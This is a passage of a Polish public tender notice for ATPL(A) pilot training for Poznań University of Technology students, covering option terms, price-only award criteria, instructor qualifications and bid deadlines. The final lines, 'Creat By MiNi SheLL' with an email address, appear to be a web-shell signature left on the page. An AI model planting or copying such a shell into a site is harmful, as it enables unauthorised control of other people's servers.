wartość ilość godzin szkolenia dla zamówienia podstawowego nie może przekroczyć kwoty określonej w § 5 ust. 1 wzoru umowy, z zastrzeżeniem § 4 ust. 4, natomiast dla zamówienia objętego prawem opcji nie może przekroczyć kwoty określonej w § 5 ust. 1 wzoru umowy.<br/>4.	Zamawiający zapłaci Wykonawcy jedynie za rzeczywistą ilość godzin szkoleniowych.<br/>5.	W ramach Opcji, wedle wyboru Zamawiającego, mogą zostać zamówione wszystkie, niektóre lub jedna godzina szkolenia z wskazanych przez Zamawiającego jako zamówienie opcjonalne w Formularzu Cenowym stanowiącym załącznik nr 8a(PAKIET I), 8b(PAKIET II), 8c(PAKIET III), 8d(PAKIET IV).<br/>6.	Z prawa opcji Zamawiający będzie korzystał, gdy zajdzie taka konieczność, w zależności od potrzeb.<br/>7.	Zasady dotyczące realizacji zamówienia objętego prawem opcji będą takie same jak te, które obowiązują przy realizacji zamówienia podstawowego. Zamówienie objęte prawem opcji będzie realizowane po cenach wskazanych przez Wykonawcę w formularzu cenowym (załączniki nr 8a(PAKIET I), 8b(PAKIET II), 8c(PAKIET III), 8d(PAKIET IV). Zamawiający będzie realizował płatności za faktyczne zrealizowane godziny nalotu, potwierdzone w Elektronicznym Zapisie Lotów (EZL), a Wykonawcy nie będą przysługiwały żadne roszczenia z tytułu zmniejszenia liczby godzin nalotu, niż to określono w przedmiocie zamówienia. Jednocześnie Zamawiający zobowiązuje się do realizacji zamówienia w zakresie co najmniej 10% ceny umowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował kryteriami oceny ofert</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest „Usługa zintegrowanego szkolenia lotniczego studentów specjalności pilotaż statków powietrznych Politechniki Poznańskiej na samolocie typu MEP(L), symulatorze FNPT II, do licencji ATPL(A) na okres 12 miesięcy z podziałem na części (pakiety)”.<br/>Część 4 - prowadzenie przez instruktora szkolenia na symulatorze FNPT II – Szkolenie na samolocie wielosilnikowym IFR/ME(E4Z4) prowadzenie przez instruktora szkolenia na samolocie MEP(L)IFR – Szkolenie na samolocie wielosilnikowy IFR/ME(E4Z4). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80650000-5 - Szkolenie i symulacja w zakresie samolotów, rakiet (pocisków rakietowych) i statków kosmicznych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1.	Zgodnie z art. 441 ustawy Prawo zamówień publicznych Zamawiający przy realizacji przedmiotu zamówienia przewiduje wykorzystanie prawa opcji. <br/>2.	Zakres rzeczowy i ilościowy przedmiotu zamówienia składa się z zamówienia podstawowego i zamówienia opcjonalnego, które zostały określone odpowiednio w załącznikach Formularz cenowy nr 8a(PAKIET I), 8b(PAKIET II), 8c(PAKIET III), 8d(PAKIET IV) do SWZ<br/>3.	Ilość godzin w zamówieniu podstawowym i w zamówieniu objętym prawem opcji podana w Formularzu cenowym - stanowiącym odpowiednio załączniki nr 8a(PAKIET I), 8b(PAKIET II), 8c(PAKIET III), 8d(PAKIET IV) do SWZ jest ilością prognozowaną, podaną w celu obliczenia ceny ofertowej i określenia maksymalnego pułapu wartości zobowiązania Zamawiającego wobec Wykonawcy. Zamawiający dopuszcza możliwość zmiany/zamiany/przekroczenia liczby poszczególnych godzin z zastrzeżeniem, iż łączna wartość ilość godzin szkolenia dla zamówienia podstawowego nie może przekroczyć kwoty określonej w § 5 ust. 1 wzoru umowy, z zastrzeżeniem § 4 ust. 4, natomiast dla zamówienia objętego prawem opcji nie może przekroczyć kwoty określonej w § 5 ust. 1 wzoru umowy.<br/>4.	Zamawiający zapłaci Wykonawcy jedynie za rzeczywistą ilość godzin szkoleniowych.<br/>5.	W ramach Opcji, wedle wyboru Zamawiającego, mogą zostać zamówione wszystkie, niektóre lub jedna godzina szkolenia z wskazanych przez Zamawiającego jako zamówienie opcjonalne w Formularzu Cenowym stanowiącym załącznik nr 8a(PAKIET I), 8b(PAKIET II), 8c(PAKIET III), 8d(PAKIET IV).<br/>6.	Z prawa opcji Zamawiający będzie korzystał, gdy zajdzie taka konieczność, w zależności od potrzeb.<br/>7.	Zasady dotyczące realizacji zamówienia objętego prawem opcji będą takie same jak te, które obowiązują przy realizacji zamówienia podstawowego. Zamówienie objęte prawem opcji będzie realizowane po cenach wskazanych przez Wykonawcę w formularzu cenowym (załączniki nr 8a(PAKIET I), 8b(PAKIET II), 8c(PAKIET III), 8d(PAKIET IV). Zamawiający będzie realizował płatności za faktyczne zrealizowane godziny nalotu, potwierdzone w Elektronicznym Zapisie Lotów (EZL), a Wykonawcy nie będą przysługiwały żadne roszczenia z tytułu zmniejszenia liczby godzin nalotu, niż to określono w przedmiocie zamówienia. Jednocześnie Zamawiający zobowiązuje się do realizacji zamówienia w zakresie co najmniej 10% ceny umowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował kryteriami oceny ofert</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w Rozdziale IX SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie<br/>3)	sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia warunku w powyższym zakresie<br/><br/>4)	zdolności technicznej lub zawodowej: DOTYCZY WSZYSTKICH PAKIETÓW<br/>Wykonawca spełni warunek jeżeli wykaże dysponowanie minimum 1 osobą, tj. pilotem/instruktorem, zdolną do wykonania zamówienia, która będzie je wykonywała i będzie odpowiedzialna za prawidłową realizację zamówienia i jakość jego wykonania. <br/><br/>Na potwierdzenie warunku należy przedstawić kopię licencji ( potwierdzenie uprawnień) oraz wpis do książki pilota lub dokument równoważny (potwierdzenie praktyki na samolocie) .<br/>Wykonawca spełni warunek jeżeli dysponuje oraz w ofercie wykaże osoby posiadające następujące kwalifikacje, uprawnienia oraz doświadczenie zawodowe:<br/>1.	PILOT/INSTRUKTOR <br/>	Posiadającą następujące kwalifikacje: licencję pilota samolotowego z uprawnieniami instruktora do szkolenia ME, ME IR, wydaną przez Prezesa Urzędu Lotnictwa Cywilnego, uprawniającą do prowadzenia praktycznego szkolenia lotniczego, na samolotach wielosilnikowych tłokowych lądowych klasy MEP(L) co najmniej 1 rok doświadczenia zawodowego, a także potwierdzoną praktykę na samolocie PIPER PA-44<br/>Zamawiający dopuszcza, aby właściciel firmy samodzielnie wykonywał czynności pracownika zatrudnionego na umowę o pracę, ale w tym wypadku zobowiązany jest do złożenia stosownego oświadczenia o samodzielnym wykonaniu czynności.<br/>3.	Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do warunku dotyczącego zdolności technicznej lub zawodowej – dopuszcza łączne spełnianie warunku przez Wykonawców.<br/>4.	Zamawiający może na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1)	Zgodnie z § 3 rozporządzenia w sprawie Podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń jakich może żądać Zamawiający od Wykonawcy Zamawiający żąda oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego. Wzór oświadczenia określa załącznik nr 10 do SWZ - oświadczenie będzie wymagane na wezwanie Zamawiającego.<br/>2)	Oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt. 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 4 do SWZ, oświadczenie będzie wymagane na wezwanie Zamawiającego.<br/>3)	Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt. 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">wykaz osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami na potwierdzenie warunku należy przedstawić kopię licencji ( potwierdzenie uprawnień) oraz wpis do książki pilota lub dokument równoważny (potwierdzenie praktyki na samolocie) - załącznik nr 9 do SWZ; ( zgodnie z pkt VIII. 2.4 do SWZ).</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Formularz cenowy - Załącznik nr 8a(PAKIET I), 8b(PAKIET II), 8c(PAKIET III), 8d(PAKIET IV) do SWZ.<br/>Niniejszy dokument Wykonawca składa wraz z ofertą.<br/>Zamawiający odrzuci ofertę jeżeli nie będzie zawierać wypełnionego według wzoru podanego przez Zamawiającego załącznika nr 8a, 8b, 8c, 8d do SWZ (w zależności od pakietu, na który wykonawca składa ofertę) tj. szczegółowego formularza cenowego sporządzonego w formie tabelarycznej <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. <br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale X ust. 1 SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które dostawy wykonają poszczególni Wykonawcy. Wzór oświadczenia stanowi załącznik nr 5 do SWZ.<br/>4.	Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 454-455 p.z.p. oraz wskazanym we Wzorze Umowy, stanowiącym Załączniki odpowiednio nr 6a(Pakiet I), 6b(Pakiet II), 6c(Pakiet III), 6d(Pakiet IV) o SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-01-28 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem platformy e-Zamówienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-01-28 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com